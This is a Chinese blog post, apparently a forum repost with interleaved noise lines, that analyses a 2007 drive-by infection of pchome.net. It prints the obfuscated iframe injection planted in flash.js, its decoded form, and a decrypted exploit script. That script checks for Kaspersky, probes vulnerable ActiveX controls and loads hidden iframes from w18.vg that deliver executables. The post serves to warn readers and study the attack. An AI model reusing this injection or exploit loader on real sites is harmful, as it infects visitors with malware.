|
截至2007-12-28 18:17 仍未修复
; v2 g9 j" O0 ?2 B- V0 P: w3 V
9 \7 e0 K7 L+ J% x; B' n$ l! H$ P; d( f) p% R+ ?+ V
##I#KE+X#D=$I#KE+XDI=KE+=X++D$IK#E#X+DI$KE+X=D=IK$E+$X=$D#I+$KEX$#DI+K#EXD=IKE+X#D#=I==K+E==XD+I#K$E$#X$D##I
+ U, r7 G/ P+ c. Z/ t8 Y' {" V, ]
从论坛看到的消息说pchome的某页面被挂马了,于是上去找,http://article.pchome.net/content-502393-7.html#topView
6 b9 H) n' a1 j5 t5 V2 ~- P: J- J* D3 P
挂得比较隐蔽,http://btn.pchome.net/flash.js的中间被加入了如下代码:
$ r" [9 {! a4 m8 S7 j" f% ~' K7 ?4 T; r; ]* D# _
window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65\x6c\x6e"]('\x3c\x69\x66\x72\x61\x6d\x65 \x68\x65\x69\x67\x68\x74\x3d\x30 \x77\x69\x64\x74\x68\x3d\x30 \x73\x72\x63\x3d\x22\x68\x74\x74\x70\x3a\x2f\x2f\x77\x77\x77\x2e\x35\x39\x2e\x76\x63\x2f\x70\x61\x67\x65\x2f\x61\x64\x64\x5f\x36\x34\x34\x34\x35\x35\x2e\x68\x74\x6d\x22\x3e\x3c\x2f\x69\x66\x72\x61\x6d\x65\x3e');
+ P f+ P) W" a- k( N8 h- F% i2 ]6 V- J
7 k: t1 K; T1 x! d" g; U/ e也就是这个了:
C6 n. T' [- t: ]3 e' |9 \0 D h
window["document"]["writeln"]('<iframe height=0 width=0 src="http://www.59.vc/page/add_644455.htm"></iframe>');/ g( V8 L9 v1 H1 D! N. l
4 K) V. p. E0 [5 N8 \) v1 G
但只有这个js还不会使得那个iframe生效,使得他生效的是调用这个js显示flash 的代码:
0 w( Y8 u; k/ Y0 x% U& C& f
) g: g5 f( Z* j% U; l- Y<script language="javascript" type="text/javascript">4 F. q( `* v `6 ]" b2 @
writeflashhtml("_swf=http://btn.pchome.net/pchome/20071217/300_250.swf", "_width=300", "_height=250" ,"_wmode=opaque");
8 k4 ^2 b2 N7 M. N</script>
5 U) q1 ^0 |- U4 {- p
/ o, D+ Y) w: ?4 c有了这个,iframe就生效了;经过一番调用和解密后得:
9 k6 l* L; P j9 |, I
/ w ~4 O! W" H- ]function bIsKIS(){for(i=2;i<26;i++){var kis6=new Image();var kis7=new Image();var root=String.fromCharCode(65+i);kis6.src="mkMSITStore:"+root+":\\Program Files\\Kaspersky Lab\\Kaspersky Internet Security 6.0\\Doc\\context.chm::/images/help.gif";kis7.src="mkMSITStore:"+root+":\\Program Files\\Kaspersky Lab\\Kaspersky Internet Security 7.0\\Doc\\context.chm::/images/help.gif";if(kis6.height==41||kis7.height==41)return true}return false}var Then=new Date();aaxxx="xxxyyyyfassssfsadfasdf";Then.setTime(Then.getTime()+24*60*60*1000);var aaffdasfascookie=new String(document.cookie);var cookieHeader="Cookie1=";aaxxx="xxxyyyyfassssfsadfasdf";if(!bIsKIS()&&aaffdasfascookie.indexOf(cookieHeader)==-1){aaxxx="xxxyyyyfassssfsadfasdf";document.cookie="Cookie1=POPWINDOS;expires="+Then.toGMTString();aaxxx="xxxyyyyfassssfsadfasdf";try{if(new ActiveXObject("IERPCtl.IERPCtl.1"))document.write('<iframe style=display:none src="http://w18.vg/real.gif"></iframe>')}catch(e){}try{if(navigator.userAgent.toLowerCase().indexOf("msie 7")==-1)document.write('<iframe style=display:none src="http://w18.vg/ms.gif"></iframe>')}catch(e){}try{if(new ActiveXObject("DPClient.Vod"))document.write('<iframe style=display:none src="http://w18.vg/xl.gif"></iframe>')}catch(e){}try{if(new ActiveXObject("GLCHAT.GLChatCtrl.1"))document.write('<iframe style=display:none src="http://w18.vg/lz.gif"></iframe>')}catch(e){}try{if(new ActiveXObject("MPS.StormPlayer.1"))document.write('<iframe style=display:none src="http://w18.vg/bf.gif"></iframe>')}catch(e){}try{if(new ActiveXObject("BaiduBar.Tool.1"))document.write('<iframe style=display:none src="http://w18.vg/baidu.gif"></iframe>')}catch(e){}}) n2 G$ \$ t. Z# Q2 |
D% d6 v `6 t; B8 l6 Z) }
K##E+XD++IK+EX=#D$IKEXD+$I#KEXDI+K$EX$DI$$KE##X#DI=K+E$X=$DI#K+#EX=DIK=E$=XDIK=$EX=DIK$E$#X=D=I##KE#=X+$D+
7 Z5 R3 [3 [: Y6 ~$ t. z4 }- m, A6 g& l) T+ w4 i r
+ X5 }! B9 L6 H7 t$ [: @- R
挑了几个解密得:http://w18.vg/s.exe
+ R& K0 G. N# r8 k9 G; ~4 |# c$ `# t+ ]& E
从这个文件里面得到另外一个链接:http://w18.vg/ss.exe+ S3 i j, u* L+ v8 P2 d5 S0 P% p
4 p- `. Z9 L: E9 T% T3 h5 z$ ^有点面熟的东西……
$ D7 ^- c: a6 U: q y1 H1 j
) z0 r% O; m0 u6 k$ h2 u! \0 d##K=E#X+D=IKE$XD$=I==K+#EXD=#I=KE$+XDI#K$=EX=D=#IK+E=X$D==I=#K=E##X$D$+IK=#EXD+IK$EX$=D+I+K#E$XD+IKEX#D
: [0 c' A# J4 q; `/ L# i
9 Z( y o7 E3 D7 ~( s3 X从上面可以知道,出问题的是那个flash.js,因此所有使用这个js来放flash的页面全都有毒了!我随便找了几个页面,发现都是有毒的,这回可是大面积的被挂咯,同志们自己小心了。& @1 q& n' J* p ~0 U$ h
* N# n. K7 e: ~4 h: L; ~
K$EX=+DI#$KE+X#DIK$EXD$I=KE$XD+#I+KEXD=I+KE=X$D=I=KEXD#=IK==E$X=D=I#+KEXD=IK#EX#DI=K=E=X=#DIKEXDI#KE
1 E( x Y% } c
4 ^! U! p5 q( y2 }8 E$ l: ]! \转载请保留声明!(http://hi.baidu.com/dikex/blog/item/36300afa339a8c889e5146f5.html)
' e V5 q2 Q4 J" d; E9 p9 z! X( s& ^) K
( I8 e8 x2 L! M+ n. _5 o8 V
作者dikex(六翼刺猬),原文链接:http://hi.baidu.com/dikex/blog/item/92f804c70762ead8d10060ff.html |
|